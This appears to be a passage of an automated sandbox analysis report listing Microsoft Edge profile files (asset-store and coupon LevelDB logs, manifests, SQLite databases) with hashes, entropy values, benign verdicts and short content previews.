Entropy (8bit):	5.222870491631754
Encrypted:	false
SSDEEP:	24576:v+/PN8FwfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8Cfx2mjF
MD5:	AA449EFD366A3859F3C1F4963183CEE6
SHA1:	1F260D62D7086C571416DDC6CB836372A80AFE3C
SHA-256:	AC0A64D4E56522966E17E0A38CA1B1C220D3AC22967D517D5745539E220C90D3
SHA-512:	71F83CEBB1AB233E90BDC986BF5ECC73A1B1156A96F3555C92CB2B48926C533BCC4B2871E7167DE5AE13CB6EE3200695F07DEFA03CE63452F364D21C725644BE
Malicious:	false
Preview:	...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4...13340900604462938.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	387
Entropy (8bit):	5.586209783683333
Encrypted:	false
SSDEEP:	6:2/1g7Xzwk8L4yfnwk8RL6GzwkpoXrDVvskoafRUjGSIpO6gpXj8VW3AnY4n:ko8Lrfl8tDivx5/e9IM6NW3AVn
MD5:	C01DD33FDA84385CE7112A076A94D47A
SHA1:	475A75536A413C063461C04336B3609A9CBC12EA
SHA-256:	9CA019CCCDDF7E4D4E71B9FC42ACDCFC31E2621A0B9CA49399BB586FEA1EAFA6
SHA-512:	DABE9286E957D03215FDB1D97F413AA4D33202785F5CA4F6CD844ECEFBEBEAAD15E9F0D4CB02EE3D90A83B415B82DC3884B0F3922384051C4A65ACAE72997D1F
Malicious:	false
Preview:	....\|................QUERY_TIMESTAMP:addressbar_uu_files.en-gb1...13375684700221680.$QUERY:addressbar_uu_files.en-gb1....[{"name":"addressbar_uu_files.en-gb","url":"https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=AddressBar","version":{"major":1,"minor":0,"patch":2},"hash":"Z0h6vxfeYITPbRF/BVHpLTuo3HCwjRfTaFYDRReZ7yg=","size":403024}]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.103038136486479
Encrypted:	false
SSDEEP:	6:H2AXd3+q2P923oH+Tcwt9Eh1tIFUt8Y23Zmw+Y23A83f0PX2JHc3fxvKY2SX4jVP:Zov4Yeb9Eh16FUt8F/+gdKNjh
MD5:	F7FBA11EDF4E69BDE88FAA62F80DC28B
SHA1:	EFEF0B957A015B40921668E06AA7E649CE5B6051
SHA-256:	68F12646F2B08F6EDBB2FA877F9CFBA9B2B10CB8369E662BC81DAA192F367A4A
SHA-512:	FA2E10DD2714E8D050DCC13B46AB410AC44F41C17D43CA512BEFE43EC17CE660DC2E4A3239D6991167F9EF810E1EF06AB073800102DD956B7FBF143723E87FFD
Malicious:	false
Preview:	2024/11/09-22:58:19.121 2328 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/09-22:58:19.122 2328 Recovering log #3.2024/11/09-22:58:19.145 2328 Level-0 table #3: started.2024/11/09-22:58:19.229 2328 Level-0 table #3: 739857 bytes OK.2024/11/09-22:58:19.234 2328 Delete type=0 #3.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.103038136486479
Encrypted:	false
SSDEEP:	6:H2AXd3+q2P923oH+Tcwt9Eh1tIFUt8Y23Zmw+Y23A83f0PX2JHc3fxvKY2SX4jVP:Zov4Yeb9Eh16FUt8F/+gdKNjh
MD5:	F7FBA11EDF4E69BDE88FAA62F80DC28B
SHA1:	EFEF0B957A015B40921668E06AA7E649CE5B6051
SHA-256:	68F12646F2B08F6EDBB2FA877F9CFBA9B2B10CB8369E662BC81DAA192F367A4A
SHA-512:	FA2E10DD2714E8D050DCC13B46AB410AC44F41C17D43CA512BEFE43EC17CE660DC2E4A3239D6991167F9EF810E1EF06AB073800102DD956B7FBF143723E87FFD
Malicious:	false
Preview:	2024/11/09-22:58:19.121 2328 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/09-22:58:19.122 2328 Recovering log #3.2024/11/09-22:58:19.145 2328 Level-0 table #3: started.2024/11/09-22:58:19.229 2328 Level-0 table #3: 739857 bytes OK.2024/11/09-22:58:19.234 2328 Delete type=0 #3.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old~RF63134.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	358
Entropy (8bit):	5.103038136486479
Encrypted:	false
SSDEEP:	6:H2AXd3+q2P923oH+Tcwt9Eh1tIFUt8Y23Zmw+Y23A83f0PX2JHc3fxvKY2SX4jVP:Zov4Yeb9Eh16FUt8F/+gdKNjh
MD5:	F7FBA11EDF4E69BDE88FAA62F80DC28B
SHA1:	EFEF0B957A015B40921668E06AA7E649CE5B6051
SHA-256:	68F12646F2B08F6EDBB2FA877F9CFBA9B2B10CB8369E662BC81DAA192F367A4A
SHA-512:	FA2E10DD2714E8D050DCC13B46AB410AC44F41C17D43CA512BEFE43EC17CE660DC2E4A3239D6991167F9EF810E1EF06AB073800102DD956B7FBF143723E87FFD
Malicious:	false
Preview:	2024/11/09-22:58:19.121 2328 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/09-22:58:19.122 2328 Recovering log #3.2024/11/09-22:58:19.145 2328 Level-0 table #3: started.2024/11/09-22:58:19.229 2328 Level-0 table #3: 739857 bytes OK.2024/11/09-22:58:19.234 2328 Delete type=0 #3.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	148
Entropy (8bit):	5.465592091960299
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjV+nhsn5smszAETD9WLHEm1eaJgW6KC3Lk:scoBY7jcnhMemszwk5ogw5
MD5:	72338E361EC51A732F1A7862986FA239
SHA1:	F5CC1EA2CE2E1CD126AD763038825FB6A49B2B2A
SHA-256:	1B2FCD8B59C232FA1D3776E8257CE7ACA79B1C16F5962EED0D0332FDC75D56C2
SHA-512:	70615BE4458F69293787CAA4BAFB1684BEA4A87797247F7342A8C0A94A0CC7AEF13CA5DCAECADC57EE1269016BE71A7027CEC03F2F3B3767D75795DB1C8F8B73
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......NG.5d...............-'ASSET:addressbar_uu_files.en-gb........-QUERY_TIMESTAMP:signal_triggers1.13.*........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.46267518427524834
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBud82:TouQq3qh7z3bY2LNW9WMcUvBup
MD5:	406C8B84669908D3ED2F342DCDD6A2B3
SHA1:	57B845F84339F81A41B84158B3E7F2E3A0B63563
SHA-256:	AB221378AF691C7BA90F28F6A97DA2AC6E9DC03D10C6D07CD16AD1B20025DEB5
SHA-512:	A7A7100C43A4AE53538B2D6CD413FF755857C102A5FA9B1EF27584FBC505C3C3DB90D12172BE341E6DA7E2AC50B6E46210A361AFD421F9882E2FA49B75097A09
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018164538716206493
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zEZlp6Rt/:/M/xT02zhR1
MD5:	122F0B19ABDC1842F785AE4E8906F230
SHA1:	81F2B9F01F54D0951738BF538D2C57B6654FE203
SHA-256:	7098ED8572FE6C0718E267B0A0A3148FD0E34366B103432B0127996147ADDDC4
SHA-512:	4F44791D58C2508BADE6576C0EB22FC1DBD02696145B43B33A00BC0CB7AA2927849BCBFC54F87686965DA84720505C520991D257F7449BC6D26802E61F87F941
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	633722
Entropy (8bit):	6.009516219606402
Encrypted:	false
SSDEEP:	12288:+50m4GA6itojqEFIaN5mdmioAjruSbZJo/0twcdAeHYJqHuQSWe06fNbkJy9jLa:+5u6tqCmdXZJogwcHYJqc0ebsEG
MD5:	875F865A7769B511BC6292304E452EF6
SHA1:	F229F1F54CC9F7709BA391A0711A15D140D1352B
SHA-256:	3C776F569D622344D0F326CCF4A05F948A2EAE508441FBD181EFB2D34073D78A
SHA-512:	667B39492B7E1971380E38C4CA8F42727B7D3695732F8859474F86A121DA32FB9556A56ACDE4AEF54B3AF11664D7CF4AAF5B2F9CA7CB6FAFEF334CD84DB865BB
Malicious:	false
Preview:	...m.................DB_VERSION.1O.t..................BLOOM_FILTER:..&{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":3750945,"primeBases":[5381,5381,5381,5381],"supportedDomains":"iGXucy0T4FShEYKSwQiFCt6h8cwgEpngDwgpADR4WFroPBI8BiYOtbx/e/LmzxqFgOtq/5ci+S/y/WkuI1EL4y7AacOk6OpjdCihKFxQPDkq/ExwzAsIXgElfPsdP07i4Ie/spgAI4mqXG9Ysj+t+j3EfugFiZWbND48F72WdlVSskr0nMh0KIHUMJkYqLcKMnHnA0b2D7LOtQUARkcufCPpCybyFPGra2zjO3YfS0LYV9tsI8mjZVWk937e+xoDKjoAAXs5dmrNGDF6uKAKQi99rsfl0X7VeDEE7aePq4n+Td8i5dGSuz4BAcDGQJOkfEG0/SWBLP2Kg3AxTfs8D9SzCRKoliAT491DgirQ7uxE28JZAR31SI5UDWxQazPdUve5/yZC5SH9MJcFQIqBpTT6kOFBqoGGthLoJMmwdnI5mhDAEBQASEHgbNGWyAB5gwFKxqglgXEKHefVfscwZHw35qzdO5/275NIXx89YR6VASI8Yp/S1SdaTl6AGhAgtDA74ENcIU7xDtvl2LvnqvHsqGPsklwHoMIVNw53lnKq6T4+m3I1/9vfNQBlsUFUEtNiZ6cC8lqV4IAfz/jZkrgYKhUaydtfKh2PDxw3tn7rq/gMyss4+FFHMDVa45J07O6K5gi7d8EgIsUm4BBI3jJiQBlVebGIstNJpNUK/zTqnju4G48wAtqAto0tMCXDUZGPofzZcXpbruWTrg6XGQMzfCxJ1g5f+vkwSM/lGNrA5KK94WIyuInuT6e/70Ghow/QfzkTr06QZQJdX4UhOymecuL8+951xbS

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000004.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	142
Entropy (8bit):	5.000532214862406
Encrypted:	false
SSDEEP:	3:6hl/38E28xp4m3rscUSWzq/V0F/lolltlf+nETPxpK2x7L7XvrKrBFVHZw:6r38D8xSEsI4qd0F/l49+n0PxEWTjKFy
MD5:	A270ACDB84457FF88BA6B85807C60850
SHA1:	A92D1A461B128C5D65EA2774B1712B5D0215EC45
SHA-256:	C3648C99CD117B16D857AEBE76113A3B8C0E535E463A4A7AEC3D6E9CAC0BAF35
SHA-512:	CBA1D8406BC14CE66B0FFF0742763588A6BFC940C3BE4D17FC0751F392EC539DD118E1E073BCC7086503E19014233593B0E04DE23926C9F1F40E473914FE617B
Malicious:	false
Preview:	. 7.9................BLOOM_FILTER_EXPIRY_TIME:.1731297420.213067...MG................BLOOM_FILTER_LAST_MODIFIED:.Sun, 10 Nov 2024 01:59:39 GMT

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	633697
Entropy (8bit):	6.0089111835623
Encrypted:	false
SSDEEP:	12288:25094GARitojqQFkaN5wdmi/AjrjSHvJon0tw0dAezYJqDuQbWe0yzNbkJybjmH:25xRtq4wdXrJoYw0zYJqr0MbsIc
MD5:	CFAD747B7A3243B4D537C222D3D4A769
SHA1:	A795D2E83361B4C90656224344FD600CF659C8FE
SHA-256:	BF9049B93441C990A518A5395F85B2A2EC2045C1E1C03920D59E54C665EF5CCB
SHA-512:	A38D47B8E81FCC5BCF1E0C82A1B1A21229E430BC1A5171E100F996A9323D01ABC5E9068C380A27D604789C0D81F1484B70A7EC923B4B9A8C64AD4639F25D9B60
Malicious:	false
Preview:	....&BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":3750945,"primeBases":[5381,5381,5381,5381],"supportedDomains":"iGXucy0T4FShEYKSwQiFCt6h8cwgEpngDwgpADR4WFroPBI8BiYOtbx/e/LmzxqFgOtq/5ci+S/y/WkuI1EL4y7AacOk6OpjdCihKFxQPDkq/ExwzAsIXgElfPsdP07i4Ie/spgAI4mqXG9Ysj+t+j3EfugFiZWbND48F72WdlVSskr0nMh0KIHUMJkYqLcKMnHnA0b2D7LOtQUARkcufCPpCybyFPGra2zjO3YfS0LYV9tsI8mjZVWk937e+xoDKjoAAXs5dmrNGDF6uKAKQi99rsfl0X7VeDEE7aePq4n+Td8i5dGSuz4BAcDGQJOkfEG0/SWBLP2Kg3AxTfs8D9SzCRKoliAT491DgirQ7uxE28JZAR31SI5UDWxQazPdUve5/yZC5SH9MJcFQIqBpTT6kOFBqoGGthLoJMmwdnI5mhDAEBQASEHgbNGWyAB5gwFKxqglgXEKHefVfscwZHw35qzdO5/275NIXx89YR6VASI8Yp/S1SdaTl6AGhAgtDA74ENcIU7xDtvl2LvnqvHsqGPsklwHoMIVNw53lnKq6T4+m3I1/9vfNQBlsUFUEtNiZ6cC8lqV4IAfz/jZkrgYKhUaydtfKh2PDxw3tn7rq/gMyss4+FFHMDVa45J07O6K5gi7d8EgIsUm4BBI3jJiQBlVebGIstNJpNUK/zTqnju4G48wAtqAto0tMCXDUZGPofzZcXpbruWTrg6XGQMzfCxJ1g5f+vkwSM/lGNrA5KK94WIyuInuT6e/70Ghow/QfzkTr06QZQJdX4UhOymecuL8+951xbSZp/lItJVc83n/v//8eVAmARhBVxCehBLmvFEEpJYLVMX

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.209704201518243
Encrypted:	false
SSDEEP:	12:T+v4Yebn9GFUt8A/+kyV5LYebn95Z9RlWf0TnVTWfSK0Vs5h7h:Q4Yeb9ig8OULYeb9zrNTnV76h
MD5:	56EF1675AA0FC8019CADC79FEE3472D3
SHA1:	6BD1A8A485D20610CC8E91C3D751EDECF6D62C5D
SHA-256:	501C909F7C79347AB98909FCB63837382EF46B9031D75AC93933A07905A4A6EC
SHA-512:	0B83F5612A3C691DC5388D6EC149ADFE60165A87A8556ED7FB86133BB8A62C53C9D0F2460FAB9A95D963571EDE4EE157142BF5FE62E5E4D0914B761FA0EAB1F4
Malicious:	false
Preview:	2024/11/09-22:55:13.600 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/09-22:55:13.600 1ddc Recovering log #3.2024/11/09-22:55:13.601 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/11/09-22:57:00.238 1dd0 Level-0 table #5: started.2024/11/09-22:57:00.270 1dd0 Level-0 table #5: 633697 bytes OK.2024/11/09-22:57:00.271 1dd0 Delete type=0 #3.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.209704201518243
Encrypted:	false
SSDEEP:	12:T+v4Yebn9GFUt8A/+kyV5LYebn95Z9RlWf0TnVTWfSK0Vs5h7h:Q4Yeb9ig8OULYeb9zrNTnV76h
MD5:	56EF1675AA0FC8019CADC79FEE3472D3
SHA1:	6BD1A8A485D20610CC8E91C3D751EDECF6D62C5D
SHA-256:	501C909F7C79347AB98909FCB63837382EF46B9031D75AC93933A07905A4A6EC
SHA-512:	0B83F5612A3C691DC5388D6EC149ADFE60165A87A8556ED7FB86133BB8A62C53C9D0F2460FAB9A95D963571EDE4EE157142BF5FE62E5E4D0914B761FA0EAB1F4
Malicious:	false
Preview:	2024/11/09-22:55:13.600 1ddc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/09-22:55:13.600 1ddc Recovering log #3.2024/11/09-22:55:13.601 1ddc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/11/09-22:57:00.238 1dd0 Level-0 table #5: started.2024/11/09-22:57:00.270 1dd0 Level-0 table #5: 633697 bytes OK.2024/11/09-22:57:00.271 1dd0 Delete type=0 #3.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	103
Entropy (8bit):	5.241151534110312
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjKWkn6yhin5SEq8xFxN3erkEtl:scoBY7jon6x3xFDkHl
MD5:	70255447F778BF6CDBF7E99C44A9387E
SHA1:	89682448EF3F81305A8266BE4A21FC8680DAABAC
SHA-256:	6295F721DB69466964ECDB6ADB933AEC1AFE2A96B8CF6EA0443D6410F77808CF
SHA-512:	968B8E0F9C0435CC8411021E0AE4B6546918A74C53132B7F486F5FBF6FA53954C4E8AAD8F633503D1961865B3F16B4E8385B095B319F230787690B2852B5B899
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator.......a#.7...............&.BLOOM_FILTER:.........DB_VERSION........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6138088879440511
Encrypted:	false
SSDEEP:	24:TLapR+DDNzWjJ0npnyXKUO8+jv51QpV51tmL:TO8D4jJ/6Up+x
MD5:	D097238B61F6D90AD1185278390C2880
SHA1:	EB40D3585322C217B29C82B99692A92A2CAAE6D4
SHA-256:	53413492AFE46492F1B88E5DDDAA47229081657228D090FD60755D995CAD5E21
SHA-512:	E4D5D5A6E4186BAF04F2357FA90BA7B76CCFA64B66DF1ABF0A8A4065CCC6BFBC7CD5B1D2905EF95E7778FE3F2E2B7F6367549C721008AA7596EF4177641BB302
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354107876676408
Encrypted:	false
SSDEEP:	6144:8A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:8FdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	696CDDA7CDDAE5E87D1B3CA6047ED6CD
SHA1:	E721FCD7EBBC531BB060074021951A4556DACE60
SHA-256:	23A69DBBD7C4C2ED3A289AEFA482B5D80C0722B9CEF7597007FAD989C6958120
SHA-512:	D7100F3FE739E8CCA59872D306635AF69C51110DA858772EEA7ADF5D91C2142802A580C9DF3A280C1A313E19CCEF8C847F54DF1854C554C4420991DAB223292F
Malicious:	false
Preview:	...m.................DB_VERSION.1"..Vq...............&QUERY_TIMESTAMP:domains_config_gz2...13375684520466445..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	311
Entropy (8bit):	5.156448614682443
Encrypted:	false
SSDEEP:	6:H2svAR1923oH+Tcwtk2WwnvB2KLlV2sRl1F39+q2P923oH+Tcwtk2WwnvIFUv:zo8YebkxwnvFL7D1FN+v4YebkxwnQFUv
MD5:	62C1FC6F4DA50EAAEE12928448D35E41
SHA1:	B03CAD5C17E0CA0BFEF61A446B91BFDE1C43D393
SHA-256:	0544F8750AF968B69EDEAB6EFA15AEEE5165F3C9501A4BE863C3CC465D5E4B1F
SHA-512:	7223149F856038EEBED465004FFAE7F908DB038229574488D888783529142E3455519B35DD21B83D94AA87722113286198A75A1A8645635E6378697AD7C63A66
Malicious:	false
Preview:	2024/11/09-22:55:19.267 227c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/09-22:55:19.291 227c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.324603081972588
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R4:C1gAg1zfvg
MD5:	3AFAF4FD95AF0A79B9060CFA1E80DDD2
SHA1:	8884970E20F6CAEF64208892983E62A94340AD96
SHA-256:	F9F44808360E8521600C1978C4B1A6D3C460300A09005B378B187CEB7AD617B0
SHA-512:	4804F9C37BC965905DC6BF30652B1FEB3CC05A9A66A095120A6368643AA0E66B096F5ED4E29FDEC0B0081C541A67D8CE004795660EF33675038A8E9671B938C6
Malicious:	false
